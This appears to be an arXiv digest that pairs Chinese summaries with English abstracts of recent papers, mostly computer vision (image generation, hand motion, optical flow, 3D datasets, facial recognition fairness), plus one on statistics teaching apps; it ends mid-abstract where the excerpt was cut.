【速读】:该论文旨在解决统计学教学中学生因缺乏编程基础而难以进行统计计算与推理的问题。解决方案的关键在于开发了一套基于R语言和Shiny框架的开源交互式Web应用(Statistics 101、201和202),使学生无需掌握编程即可完成概率分布计算、置信区间构建、假设检验及简单线性回归建模等任务;每个应用同时提供数值结果、ggplot2生成的可视化图表以及MathJax渲染的数学推导过程,实现计算与统计推理在单一界面中的同步呈现,从而增强学习效果。
链接: https://arxiv.org/abs/2603.28274
作者: Antoine Soetewey
机构: HEC Liège, ULiège, Rue Louvrex 14, 4000 Liège, Belgium; UCLouvain; UNamur
类目: Other Statistics (stat.OT); Human-Computer Interaction (cs.HC); Programming Languages (cs.PL)
备注: 6 pages, 0 figure
Abstract:Statistics 101, 201, and 202 are three open-source interactive web applications built with R \citepR and Shiny \citepshiny to support the teaching of introductory statistics and probability. The apps help students carry out common statistical computations – computing probabilities from standard probability distributions, constructing confidence intervals, conducting hypothesis tests, and fitting simple linear regression models – without requiring prior knowledge of R or any other programming language. Each app provides numerical results, plots rendered with \textttggplot2 \citepggplot2, and inline mathematical derivations typeset with MathJax \citepcervone2012mathjax, so that computation and statistical reasoning appear side by side in a single interface. The suite is organised around a broad pedagogical progression: Statistics~101 introduces probability distributions and their properties; Statistics~201 addresses confidence intervals and hypothesis tests; and Statistics~202 covers the simple linear model. All three apps are freely accessible online and their source code is released under a CC-BY-4.0 license.
计算机视觉
[CV-0] Gen-Searcher: Reinforcing Agent ic Search for Image Generation
【速读】:该论文旨在解决当前生成式 AI(Generative AI)图像模型因内部知识冻结而导致在需要外部知识或实时信息的现实场景中表现不佳的问题。其核心挑战在于如何使图像生成模型具备多跳推理与检索能力,从而获取必要的文本知识和参考图像以实现基于上下文的精准生成。解决方案的关键在于提出 Gen-Searcher,一个首次训练的搜索增强型图像生成智能体,通过构建定制化的数据流水线并创建两个高质量数据集(Gen-Searcher-SFT-10k 和 Gen-Searcher-RL-6k),结合监督微调(SFT)与双奖励反馈的代理强化学习(agentic reinforcement learning with dual reward feedback),其中奖励机制融合文本与图像维度,提升了训练稳定性与泛化能力。实验表明,该方法显著优于基线模型,在 KnowGen 和 WISE 基准上分别提升约 16 和 15 分。
链接: https://arxiv.org/abs/2603.28767
作者: Kaituo Feng,Manyuan Zhang,Shuang Chen,Yunlong Lin,Kaixuan Fan,Yilei Jiang,Hongyu Li,Dian Zheng,Chenyang Wang,Xiangyu Yue
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Project page: this https URL Code: this https URL
Abstract:Recent image generation models have shown strong capabilities in generating high-fidelity and photorealistic images. However, they are fundamentally constrained by frozen internal knowledge, thus often failing on real-world scenarios that are knowledge-intensive or require up-to-date information. In this paper, we present Gen-Searcher, as the first attempt to train a search-augmented image generation agent, which performs multi-hop reasoning and search to collect the textual knowledge and reference images needed for grounded generation. To achieve this, we construct a tailored data pipeline and curate two high-quality datasets, Gen-Searcher-SFT-10k and Gen-Searcher-RL-6k, containing diverse search-intensive prompts and corresponding ground-truth synthesis images. We further introduce KnowGen, a comprehensive benchmark that explicitly requires search-grounded external knowledge for image generation and evaluates models from multiple dimensions. Based on these resources, we train Gen-Searcher with SFT followed by agentic reinforcement learning with dual reward feedback, which combines text-based and image-based rewards to provide more stable and informative learning signals for GRPO training. Experiments show that Gen-Searcher brings substantial gains, improving Qwen-Image by around 16 points on KnowGen and 15 points on WISE. We hope this work can serve as an open foundation for search agents in image generation, and we fully open-source our data, models, and code.
[CV-1] HandX: Scaling Bimanual Motion and Interaction Generation CVPR2026
【速读】:该论文旨在解决当前人体运动合成领域中手部精细动作与双手协作行为建模不足的问题,尤其是现有全身模型难以捕捉指关节活动、接触时机及双侧手协调等细微特征,且缺乏高质量的双人手交互数据集。其解决方案的关键在于构建一个统一的基础框架 HandX,涵盖数据、标注与评估三方面:首先整合并筛选现有数据集以提升质量,并采集新的高保真双人手动作捕捉数据;其次提出一种解耦式标注策略,通过提取关键运动特征(如接触事件和手指屈曲)并结合大语言模型进行语义推理,实现细粒度、语义丰富的描述;最终基于此数据和标注体系,对扩散模型和自回归模型进行基准测试,验证了模型规模与数据质量对生成更语义一致的双人手动作具有显著正向影响。
链接: https://arxiv.org/abs/2603.28766
作者: Zimu Zhang,Yucheng Zhang,Xiyan Xu,Ziyin Wang,Sirui Xu,Kai Zhou,Bing Zhou,Chuan Guo,Jian Wang,Yu-Xiong Wang,Liang-Yan Gui
机构: University of Illinois Urbana-Champaign (伊利诺伊大学厄巴纳-香槟分校); Specs Inc. (Specs公司); Snap Inc. (Snap公司)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: CVPR 2026. Project Page: this https URL . Code: this https URL
Abstract:Synthesizing human motion has advanced rapidly, yet realistic hand motion and bimanual interaction remain underexplored. Whole-body models often miss the fine-grained cues that drive dexterous behavior, finger articulation, contact timing, and inter-hand coordination, and existing resources lack high-fidelity bimanual sequences that capture nuanced finger dynamics and collaboration. To fill this gap, we present HandX, a unified foundation spanning data, annotation, and evaluation. We consolidate and filter existing datasets for quality, and collect a new motion-capture dataset targeting underrepresented bimanual interactions with detailed finger dynamics. For scalable annotation, we introduce a decoupled strategy that extracts representative motion features, e.g., contact events and finger flexion, and then leverages reasoning from large language models to produce fine-grained, semantically rich descriptions aligned with these features. Building on the resulting data and annotations, we benchmark diffusion and autoregressive models with versatile conditioning modes. Experiments demonstrate high-quality dexterous motion generation, supported by our newly proposed hand-focused metrics. We further observe clear scaling trends: larger models trained on larger, higher-quality datasets produce more semantically coherent bimanual motion. Our dataset is released to support future research.
[CV-2] PoseDreamer: Scalable and Photorealistic Human Data Generation Pipeline with Diffusion Models
【速读】:该论文旨在解决3D人体网格估计任务中高质量标注数据获取困难的问题,现有方法要么依赖人工标注的实拍数据(规模有限),要么使用渲染合成数据(缺乏真实感、多样性不足且成本高)。其解决方案的关键在于提出PoseDreamer——一个基于扩散模型(diffusion models)生成大规模带3D网格标注的合成数据的新范式。该方法通过可控图像生成与直接偏好优化(Direct Preference Optimization)实现控制对齐、课程学习式难样本挖掘以及多阶段质量过滤,从而在保证图像与3D标签间自然对应关系的同时,优先覆盖挑战性样本,显著提升数据集实用性。实验表明,PoseDreamer生成的数据在图像质量上较传统渲染数据提升76%,且训练模型性能优于或媲美真实和传统合成数据集,并展现出与真实数据互补的优势。
链接: https://arxiv.org/abs/2603.28763
作者: Lorenza Prospero,Orest Kupyn,Ostap Viniavskyi,João F. Henriques,Christian Rupprecht
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Acquiring labeled datasets for 3D human mesh estimation is challenging due to depth ambiguities and the inherent difficulty of annotating 3D geometry from monocular images. Existing datasets are either real, with manually annotated 3D geometry and limited scale, or synthetic, rendered from 3D engines that provide precise labels but suffer from limited photorealism, low diversity, and high production costs. In this work, we explore a third path: generated data. We introduce PoseDreamer, a novel pipeline that leverages diffusion models to generate large-scale synthetic datasets with 3D mesh annotations. Our approach combines controllable image generation with Direct Preference Optimization for control alignment, curriculum-based hard sample mining, and multi-stage quality filtering. Together, these components naturally maintain correspondence between 3D labels and generated images, while prioritizing challenging samples to maximize dataset utility. Using PoseDreamer, we generate more than 500,000 high-quality synthetic samples, achieving a 76% improvement in image-quality metrics compared to rendering-based datasets. Models trained on PoseDreamer achieve performance comparable to or superior to those trained on real-world and traditional synthetic datasets. In addition, combining PoseDreamer with synthetic datasets results in better performance than combining real-world and synthetic datasets, demonstrating the complementary nature of our dataset. We will release the full dataset and generation code.
[CV-3] On-the-fly Repulsion in the Contextual Space for Rich Diversity in Diffusion Transformers SIGGRAPH2026
【速读】:该论文旨在解决当前文本到图像(Text-to-Image, T2I)扩散模型中存在的典型性偏差(typicality bias)问题,即模型在生成图像时倾向于收敛到少数几个视觉上相似的解,缺乏多样性,从而限制了其在创意类应用中的潜力。解决方案的关键在于提出一种在“上下文空间”(Contextual Space)中施加排斥力(repulsion)的新框架,通过在扩散 Transformer 的前向传播过程中干预多模态注意力通道,在文本条件与图像结构融合后的中间层块之间注入实时排斥机制,从而在结构已初步形成但尚未固定时引导生成轨迹。该方法能够在不牺牲视觉保真度或语义一致性的情况下显著提升多样性,且计算开销极小,尤其适用于现代“Turbo”和蒸馏模型,传统基于轨迹干预的方法在此类模型中通常失效。
链接: https://arxiv.org/abs/2603.28762
作者: Omer Dahary,Benaya Koren,Daniel Garibi,Daniel Cohen-Or
机构: Tel Aviv University (特拉维夫大学); Snap Research (Snap研究机构)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Graphics (cs.GR); Machine Learning (cs.LG)
备注: Conditionally accepted to SIGGRAPH 2026. Project page: this https URL
Abstract:Modern Text-to-Image (T2I) diffusion models have achieved remarkable semantic alignment, yet they often suffer from a significant lack of variety, converging on a narrow set of visual solutions for any given prompt. This typicality bias presents a challenge for creative applications that require a wide range of generative outcomes. We identify a fundamental trade-off in current approaches to diversity: modifying model inputs requires costly optimization to incorporate feedback from the generative path. In contrast, acting on spatially-committed intermediate latents tends to disrupt the forming visual structure, leading to artifacts. In this work, we propose to apply repulsion in the Contextual Space as a novel framework for achieving rich diversity in Diffusion Transformers. By intervening in the multimodal attention channels, we apply on-the-fly repulsion during the transformer’s forward pass, injecting the intervention between blocks where text conditioning is enriched with emergent image structure. This allows for redirecting the guidance trajectory after it is structurally informed but before the composition is fixed. Our results demonstrate that repulsion in the Contextual Space produces significantly richer diversity without sacrificing visual fidelity or semantic adherence. Furthermore, our method is uniquely efficient, imposing a small computational overhead while remaining effective even in modern “Turbo” and distilled models where traditional trajectory-based interventions typically fail.
[CV-4] SHOW3D: Capturing Scenes of 3D Hands and Objects in the Wild CVPR2026
【速读】:该论文旨在解决第一人称视角计算机视觉(egocentric computer vision)中对人体手部与物体交互的三维理解(3D understanding)难题,尤其是现有手-物交互数据集多在受控演播室环境中采集,导致模型泛化能力受限的问题。其解决方案的关键在于提出了一种无标记的多摄像头捕捉系统(marker-less multi-camera system),该系统通过轻量化背挂式多相机阵列与用户佩戴的VR头显同步校准,实现了在真实野外环境下的近自由移动捕捉,并结合第一人称-第三人称协同跟踪流程(ego-exo tracking pipeline)生成高精度的3D标注,从而显著缓解了环境真实性与3D标注准确性之间的权衡矛盾。
链接: https://arxiv.org/abs/2603.28760
作者: Patrick Rim,Kevin Harris,Braden Copple,Shangchen Han,Xu Xie,Ivan Shugurov,Sizhe An,He Wen,Alex Wong,Tomas Hodan,Kun He
机构: Meta Reality Labs (Meta现实实验室); Yale University (耶鲁大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Robotics (cs.RO)
备注: CVPR 2026
Abstract:Accurate 3D understanding of human hands and objects during manipulation remains a significant challenge for egocentric computer vision. Existing hand-object interaction datasets are predominantly captured in controlled studio settings, which limits both environmental diversity and the ability of models trained on such data to generalize to real-world scenarios. To address this challenge, we introduce a novel marker-less multi-camera system that allows for nearly unconstrained mobility in genuinely in-the-wild conditions, while still having the ability to generate precise 3D annotations of hands and objects. The capture system consists of a lightweight, back-mounted, multi-camera rig that is synchronized and calibrated with a user-worn VR headset. For 3D ground-truth annotation of hands and objects, we develop an ego-exo tracking pipeline and rigorously evaluate its quality. Finally, we present SHOW3D, the first large-scale dataset with 3D annotations that show hands interacting with objects in diverse real-world environments, including outdoor settings. Our approach significantly reduces the fundamental trade-off between environmental realism and accuracy of 3D annotations, which we validate with experiments on several downstream tasks. this http URL
[CV-5] FlowIt: Global Matching for Optical Flow with Confidence-Guided Refinement
【速读】:该论文旨在解决光学流估计(optical flow estimation)中因大像素位移导致的匹配不准确问题,尤其在处理长距离运动和遮挡区域时传统方法表现不佳。其解决方案的关键在于提出一种基于分层Transformer架构的新型网络FlowIt,通过全局上下文建模增强对长程对应关系的捕捉能力;同时将初始光流估计建模为最优传输(optimal transport)问题,从而获得鲁棒的初始光流场及显式生成的遮挡图与置信度图;随后引入引导精修阶段,利用高置信度区域的可靠运动信息向低置信度区域传播,显著提升整体估计精度。
链接: https://arxiv.org/abs/2603.28759
作者: Sadra Safadoust,Fabio Tosi,Matteo Poggi,Fatma Güney
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:We present FlowIt, a novel architecture for optical flow estimation designed to robustly handle large pixel displacements. At its core, FlowIt leverages a hierarchical transformer architecture that captures extensive global context, enabling the model to effectively model long-range correspondences. To overcome the limitations of localized matching, we formulate the flow initialization as an optimal transport problem. This formulation yields a highly robust initial flow field, alongside explicitly derived occlusion and confidence maps. These cues are then seamlessly integrated into a guided refinement stage, where the network actively propagates reliable motion estimates from high-confidence regions into ambiguous, low-confidence areas. Extensive experiments across the Sintel, KITTI, Spring, and LayeredFlow datasets validate the efficacy of our approach. FlowIt achieves state-of-the-art results on the competitive Sintel and KITTI benchmarks, while simultaneously establishing new state-of-the-art cross-dataset zero-shot generalization performance on Sintel, Spring, and LayeredFlow.
[CV-6] SonoWorld: From One Image to a 3D Audio-Visual Scene CVPR2026
【速读】:该论文旨在解决从单张图像生成沉浸式3D音视频场景(Image2AVScene)的问题,以弥补现有视觉场景生成技术在音频维度上的缺失。其核心挑战在于如何将静态图像扩展为具有空间一致性的3D环境,并同步生成与场景几何和语义对齐的三维音频(3D audio)。解决方案的关键在于提出SonoWorld框架,该框架包含四个关键步骤:首先通过outpainting生成360°全景图,继而将其提升为可导航的3D场景;随后基于语言引导放置声源锚点(sound anchors),最后渲染ambisonics格式的点声源、区域声源和环境声源,从而实现空间音频与场景结构的精确匹配。这一方法显著提升了音视频协同的沉浸感,并在真实世界数据集和用户实验中得到验证。
链接: https://arxiv.org/abs/2603.28757
作者: Derong Jin,Xiyi Chen,Ming C. Lin,Ruohan Gao
机构: University of Maryland, College Park
类目: Computer Vision and Pattern Recognition (cs.CV); Multimedia (cs.MM); Sound (cs.SD)
备注: Accepted by CVPR 2026, project page: this https URL
Abstract:Tremendous progress in visual scene generation now turns a single image into an explorable 3D world, yet immersion remains incomplete without sound. We introduce Image2AVScene, the task of generating a 3D audio-visual scene from a single image, and present SonoWorld, the first framework to tackle this challenge. From one image, our pipeline outpaints a 360° panorama, lifts it into a navigable 3D scene, places language-guided sound anchors, and renders ambisonics for point, areal, and ambient sources, yielding spatial audio aligned with scene geometry and semantics. Quantitative evaluations on a newly curated real-world dataset and a controlled user study confirm the effectiveness of our approach. Beyond free-viewpoint audio-visual rendering, we also demonstrate applications to one-shot acoustic learning and audio-visual spatial source separation. Project website: this https URL
[CV-7] Pandora: Articulated 3D Scene Graphs from Egocentric Vision BMVC
【速读】:该论文旨在解决当前机器人映射系统在构建度量-语义场景表示时存在的局限性问题,即依赖于机器人自身传感器和视角所生成的“第一人称”地图往往因机器人本体能力不足(如无法打开抽屉或触及高处柜子)而导致环境信息不完整,从而限制了其对复杂场景的理解与操作能力。解决方案的关键在于利用人类佩戴Project Aria眼镜自然探索场景时采集的自我中心(egocentric)数据,通过简单启发式方法恢复出可动物体部件(articulate object parts)的模型,并将其集成到3D场景图(3D scene graph)中,从而实现从人类经验到机器人部署的直接知识迁移,显著提升了机器人对物体动态及容器关系的理解能力,最终增强其移动操作任务的执行效果。
链接: https://arxiv.org/abs/2603.28732
作者: Alan Yu,Yun Chang,Christopher Xie,Luca Carlone
机构: Massachusetts Institute of Technology (麻省理工学院); Meta Reality Labs (Meta现实实验室)
类目: Robotics (cs.RO); Computer Vision and Pattern Recognition (cs.CV)
备注: 14 pages, 5 figures. Presented at the 2025 British Machine Vision Conference (BMVC) in Sheffield, UK
Abstract:Robotic mapping systems typically approach building metric-semantic scene representations from the robot’s own sensors and cameras. However, these “first person” maps inherit the robot’s own limitations due to its embodiment or skillset, which may leave many aspects of the environment unexplored. For example, the robot might not be able to open drawers or access wall cabinets. In this sense, the map representation is not as complete, and requires a more capable robot to fill in the gaps. We narrow these blind spots in current methods by leveraging egocentric data captured as a human naturally explores a scene wearing Project Aria glasses, giving a way to directly transfer knowledge about articulation from the human to any deployable robot. We demonstrate that, by using simple heuristics, we can leverage egocentric data to recover models of articulate object parts, with quality comparable to those of state-of-the-art methods based on other input modalities. We also show how to integrate these models into 3D scene graph representations, leading to a better understanding of object dynamics and object-container relationships. We finally demonstrate that these articulated 3D scene graphs enhance a robot’s ability to perform mobile manipulation tasks, showcasing an application where a Boston Dynamics Spot is tasked with retrieving concealed target items, given only the 3D scene graph as input.
[CV-8] Stepwise Credit Assignment for GRPO on Flow-Matching Models CVPR
【速读】:该论文旨在解决Flow-GRPO在应用于扩散模型(diffusion models)时存在的信用分配(credit assignment)不合理问题:传统方法对所有生成步骤采用均匀信用分配,忽略了扩散过程中的时序结构——早期步骤主要决定图像的低频结构(如内容与构图),而后期步骤则负责高频细节(如纹理)。这种均匀分配可能导致次优中间步骤被错误奖励,尤其是当错误在后续步骤中被修正时。解决方案的关键在于提出Stepwise-Flow-GRPO,通过基于每一步奖励改进的逐步信用分配机制,利用Tweedie公式估计中间奖励,并引入基于增益的优势函数(gain-based advantages),从而显著提升样本效率和收敛速度;同时设计了一种受DDIM启发的随机微分方程(SDE),在保持策略梯度所需随机性的同时优化奖励质量。
链接: https://arxiv.org/abs/2603.28718
作者: Yash Savani,Branislav Kveton,Yuchen Liu,Yilin Wang,Jing Shi,Subhojyoti Mukherjee,Nikos Vlassis,Krishna Kumar Singh
机构: Carnegie Mellon University (卡内基梅隆大学); Adobe Research (Adobe 研究院)
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to the IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR), 2026 Project page: this https URL
Abstract:Flow-GRPO successfully applies reinforcement learning to flow models, but uses uniform credit assignment across all steps. This ignores the temporal structure of diffusion generation: early steps determine composition and content (low-frequency structure), while late steps resolve details and textures (high-frequency details). Moreover, assigning uniform credit based solely on the final image can inadvertently reward suboptimal intermediate steps, especially when errors are corrected later in the diffusion trajectory. We propose Stepwise-Flow-GRPO, which assigns credit based on each step’s reward improvement. By leveraging Tweedie’s formula to obtain intermediate reward estimates and introducing gain-based advantages, our method achieves superior sample efficiency and faster convergence. We also introduce a DDIM-inspired SDE that improves reward quality while preserving stochasticity for policy gradients.
[CV-9] DreamLite: A Lightweight On-Device Unified Model for Image Generation and Editing
【速读】:该论文旨在解决当前扩散模型(Diffusion Models)在移动端部署时面临的两大问题:一是模型参数量庞大导致的高延迟和部署困难;二是现有轻量化模型多仅支持文本到图像(Text-to-Image, T2I)生成,缺乏对图像编辑任务的支持。解决方案的关键在于提出DreamLite——一个参数仅为0.39B的统一式轻量级扩散模型,其核心创新包括:基于剪枝后的移动U-Net骨干网络,并通过潜空间中的上下文空间拼接(in-context spatial concatenation)实现条件统一建模;输入端采用“目标 | 空白”(target | blank)配置用于生成任务,“目标 | 源图”(target | source)配置用于编辑任务;同时引入任务渐进联合预训练策略以稳定小模型训练,并结合步骤蒸馏(step distillation)将去噪过程压缩至仅4步,从而实现在小米14手机上<1秒内完成1024×1024图像的生成或编辑,成为首个支持两端任务的轻量级统一模型。
链接: https://arxiv.org/abs/2603.28713
作者: Kailai Feng,Yuxiang Wei,Bo Chen,Yang Pan,Hu Ye,Songwei Liu,Chenqian Yan,Yuan Gao
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: this https URL
Abstract:Diffusion models have made significant progress in both text-to-image (T2I) generation and text-guided image editing. However, these models are typically built with billions of parameters, leading to high latency and increased deployment challenges. While on-device diffusion models improve efficiency, they largely focus on T2I generation and lack support for image editing. In this paper, we propose DreamLite, a compact unified on-device diffusion model (0.39B) that supports both T2I generation and text-guided image editing within a single network. DreamLite is built on a pruned mobile U-Net backbone and unifies conditioning through in-context spatial concatenation in the latent space. It concatenates images horizontally as input, using a (target | blank) configuration for generation tasks and (target | source) for editing tasks. To stabilize the training of this compact model, we introduce a task-progressive joint pretraining strategy that sequentially targets T2I, editing, and joint tasks. After high-quality SFT and reinforcement learning, DreamLite achieves GenEval (0.72) for image generation and ImgEdit (4.11) for image editing, outperforming existing on-device models and remaining competitive with several server-side models. By employing step distillation, we further reduce denoising processing to just 4 steps, enabling our DreamLite could generate or edit a 1024 x 1024 image in less than 1s on a Xiaomi 14 smartphone. To the best of our knowledge, DreamLite is the first unified on-device diffusion model that supports both image generation and image editing.
[CV-10] AdaptToken: Entropy-based Adaptive Token Selection for MLLM Long Video Understanding
【速读】:该论文旨在解决多模态大语言模型(Multi-modal Large Language Models, MLLMs)在长视频理解任务中因内存开销高和上下文长度限制而导致的性能瓶颈问题。现有方法通过评分与选择短片段内的帧或标记来缓解此问题,但缺乏跨远距离视频片段的相关性比较机制以及在收集足够证据后提前停止处理的能力。其解决方案的关键在于提出一种无需训练的框架 AdaptToken,该框架将 MLLM 的自不确定性转化为全局控制信号以实现高效的 token 选择:首先将视频分组,利用跨模态注意力对每组内 token 排序,并基于模型响应熵估计每组提示的相关性;该熵信号不仅支持跨组的全局 token 预算分配,还进一步支撑早期停止策略(AdaptToken-Lite),在模型达到足够置信度时跳过剩余分组,显著降低推理时间(约减少一半)且保持相近性能。
链接: https://arxiv.org/abs/2603.28696
作者: Haozhe Qi,Kevin Qu,Mahdi Rad,Rui Wang,Alexander Mathis,Marc Pollefeys
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: Project page: this https URL
Abstract:Long video understanding remains challenging for Multi-modal Large Language Models (MLLMs) due to high memory costs and context-length limits. Prior approaches mitigate this by scoring and selecting frames/tokens within short clips, but they lack a principled mechanism to (i) compare relevance across distant video clips and (ii) stop processing once sufficient evidence has been gathered. We propose AdaptToken, a training-free framework that turns an MLLM’s self-uncertainty into a global control signal for long-video token selection. AdaptToken splits a video into groups, extracts cross-modal attention to rank tokens within each group, and uses the model’s response entropy to estimate each group’s prompt relevance. This entropy signal enables a global token budget allocation across groups and further supports early stopping (AdaptToken-Lite), skipping the remaining groups when the model becomes sufficiently certain. Across four long-video benchmarks (VideoMME, LongVideoBench, LVBench, and MLVU) and multiple base MLLMs (7B-72B), AdaptToken consistently improves accuracy (e.g., +6.7 on average over Qwen2.5-VL 7B) and continues to benefit from extremely long inputs (up to 10K frames), while AdaptToken-Lite reduces inference time by about half with comparable performance. Project page: this https URL
[CV-11] Why Aggregate Accuracy is Inadequate for Evaluating Fairness in Law Enforcement Facial Recognition Systems
【速读】:该论文旨在解决当前面部识别系统在执法和安保等高风险场景中,仅依赖整体准确率(aggregate accuracy)作为评估指标所导致的公平性被忽视的问题。研究表明,即使系统整体准确率较高,其在不同人口群体中的错误率(如假阳性率 FPR 和假阴性率 FNR)仍可能存在显著差异,从而引发系统性偏见和潜在危害。解决方案的关键在于引入子群层面(subgroup-level)的误差分布分析,并采用公平感知的评估方法与模型无关的审计策略(model-agnostic auditing strategies),以实现对实际部署系统在真实环境下的公正性和可靠性进行有效监测与改进。
链接: https://arxiv.org/abs/2603.28675
作者: Khalid Adnan Alsayed
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: 9 pages, 2 tables, 1 figure. Position paper with empirical subgroup analysis highlighting limitations of aggregate accuracy in fairness evaluation
Abstract:Facial recognition systems are increasingly deployed in law enforcement and security contexts, where algorithmic decisions can carry significant societal consequences. Despite high reported accuracy, growing evidence demonstrates that such systems often exhibit uneven performance across demographic groups, leading to disproportionate error rates and potential harm. This paper argues that aggregate accuracy is an insufficient metric for evaluating the fairness and reliability of facial recognition systems in high-stakes environments. Through analysis of subgroup-level error distribution, including false positive rate (FPR) and false negative rate (FNR), the paper demonstrates how aggregate performance metrics can obscure critical disparities across demographic groups. Empirical observations show that systems with similar overall accuracy can exhibit substantially different fairness profiles, with subgroup error rates varying significantly despite a single aggregate metric. The paper further examines the operational risks associated with accuracy-centric evaluation practices in law enforcement applications, where misclassification may result in wrongful suspicion or missed identification. It highlights the importance of fairness-aware evaluation approaches and model-agnostic auditing strategies that enable post-deployment assessment of real-world systems. The findings emphasise the need to move beyond accuracy as a primary metric and adopt more comprehensive evaluation frameworks for responsible AI deployment.
[CV-12] Sim-to-Real Fruit Detection Using Synthetic Data: Quantitative Evaluation and Embedded Deployment with Isaac Sim
【速读】:该论文旨在解决在数据受限和嵌入式部署约束条件下,如何有效利用合成数据(synthetic data)提升目标检测模型从仿真到现实世界(sim-to-real transfer)的迁移性能问题。其解决方案的关键在于采用混合训练策略(hybrid training),即结合有限的真实水果图像与在NVIDIA Isaac Sim中生成的合成数据来训练YOLO-based检测模型,从而在保持较高检测精度的同时显著减少对人工标注数据的依赖,并通过TensorRT优化实现Jetson Orin NX平台上的实时推理性能。
链接: https://arxiv.org/abs/2603.28670
作者: Martina Hutter-Mironovova
机构: YASKAWA Europe GmbH
类目: Computer Vision and Pattern Recognition (cs.CV); Robotics (cs.RO)
备注: 18 pages, 6 figures
Abstract:This study investigates the effectiveness of synthetic data for sim-to-real transfer in object detection under constrained data conditions and embedded deployment requirements. Synthetic datasets were generated in NVIDIA Isaac Sim and combined with limited real-world fruit images to train YOLO-based detection models under real-only, synthetic-only, and hybrid regimes. Performance was evaluated on two test datasets: an in-domain dataset with conditions matching the training data and a domain shift dataset containing real fruit and different background conditions. Results show that models trained exclusively on real data achieve the highest accuracy, while synthetic-only models exhibit reduced performance due to a domain gap. Hybrid training strategies significantly improve performance compared to synthetic-only approaches and achieve results close to real-only training while reducing the need for manual annotation. Under domain shift conditions, all models show performance degradation, with hybrid models providing improved robustness. The trained models were successfully deployed on a Jetson Orin NX using TensorRT optimization, achieving real-time inference performance. The findings highlight that synthetic data is most effective when used in combination with real data and that deployment constraints must be considered alongside detection accuracy.
[CV-13] Industrial3D: A Terrestrial LiDAR Point Cloud Dataset and CrossParadigm Benchmark for Industrial Infrastructure
【速读】:该论文旨在解决工业领域机电设备(MEP)设施中地面激光扫描(TLS)点云的自动语义理解难题,这是实现建筑信息模型(BIM)自动化、数字孪生构建及竣工验证等关键任务的前提。现有基准数据集(如S3DIS或ScanNet)无法充分反映水处理厂、冷冻机房等场景中存在的极端几何模糊性、严重遮挡和类别分布极度不均衡等问题。解决方案的关键在于构建了目前规模最大、最具有挑战性的工业LiDAR点云数据集Industrial3D,包含61200万条专家标注点,分辨率达6 mm,并建立了首个跨范式的工业场景基准测试体系,涵盖全监督、弱监督、无监督及基础模型等多种学习范式。实验表明,当前最优监督方法仅达到55.74% mIoU,而零样本Point-SAM仅为15.79%,揭示出工业TLS数据域迁移仍面临巨大挑战;系统分析指出该差距源于双重困境:类别统计稀疏性(类别不平衡达215:1,比S3DIS更严重3.5倍)与几何歧义性(尾部类别的点与头部类别的管道共享柱面特征),单纯基于频率的重加权策略无法有效缓解。
链接: https://arxiv.org/abs/2603.28660
作者: Chao Yin,Hongzhe Yue,Qing Han,Difeng Hu,Zhenyu Liang,Fangzhou Lin,Bing Sun,Boyu Wang,Mingkai Li,Wei Yao,Jack C.P. Cheng
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 49 pages, 8 figure, 14 tables
Abstract:Automated semantic understanding of dense point clouds is a prerequisite for Scan-to-BIM pipelines, digital twin construction, and as-built verification–core tasks in the digital transformation of the construction industry. Yet for industrial mechanical, electrical, and plumbing (MEP) facilities, this challenge remains largely unsolved: TLS acquisitions of water treatment plants, chiller halls, and pumping stations exhibit extreme geometric ambiguity, severe occlusion, and extreme class imbalance that architectural benchmarks (e.g., S3DIS or ScanNet) cannot adequately represent. We present Industrial3D, a terrestrial LiDAR dataset comprising 612 million expertly labelled points at 6 mm resolution from 13 water treatment facilities. At 6.6x the scale of the closest comparable MEP dataset, Industrial3D provides the largest and most demanding testbed for industrial 3D scene understanding to date. We further establish the first industrial cross-paradigm benchmark, evaluating nine representative methods across fully supervised, weakly supervised, unsupervised, and foundation model settings under a unified benchmark protocol. The best supervised method achieves 55.74% mIoU, whereas zero-shot Point-SAM reaches only 15.79%–a 39.95 percentage-point gap that quantifies the unresolved domain-transfer challenge for industrial TLS data. Systematic analysis reveals that this gap originates from a dual crisis: statistical rarity (215:1 imbalance, 3.5x more severe than S3DIS) and geometric ambiguity (tail-class points share cylindrical primitives with head-class pipes) that frequency-based re-weighting alone cannot resolve. Industrial3D, along with benchmark code and pre-trained models, will be publicly available at this https URL.
[CV-14] Divide and Restore: A Modular Task-Decoupled Framework for Universal Image Restoration
【速读】:该论文旨在解决多类型图像退化(如噪声、模糊或曝光不当)恢复任务中,现有复杂单体架构因任务间干扰导致性能下降及训练成本高昂的问题。其解决方案的关键在于提出一种模块化、任务解耦的图像恢复框架,通过显式诊断路由机制实现动态决策:一个轻量级卷积神经网络(CNN)分类器对输入图像进行评估,并将其引导至专门的修复节点(如U-Net专家)。该设计使不同退化类型的重建路径相互隔离,避免特征冲突,同时具备模型无关的可扩展性——新增退化类型仅需训练单一专家并更新路由器,无需重新训练整个系统,从而显著降低训练开销并提升效率。
链接: https://arxiv.org/abs/2603.28658
作者: Joanna Wiekiera,Martyna Zur
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Restoring images affected by various types of degradation, such as noise, blur, or improper exposure, remains a significant challenge in computer vision. While recent trends favor complex monolithic all-in-one architectures, these models often suffer from negative task interference and require extensive joint training cycles on high-end computing clusters. In this paper, we propose a modular, task-decoupled image restoration framework based on an explicit diagnostic routing mechanism. The architecture consists of a lightweight Convolutional Neural Network (CNN) classifier that evaluates the input image and dynamically directs it to a specialized restoration node. A key advantage of this framework is its model-agnostic extensibility: while we demonstrate it using three independent U-Net experts, the system allows for the integration of any restoration method tailored to specific tasks. By isolating reconstruction paths, the framework prevents feature conflicts and significantly reduces training overhead. Unlike monolithic models, adding new degradation types in our framework only requires training a single expert and updating the router, rather than 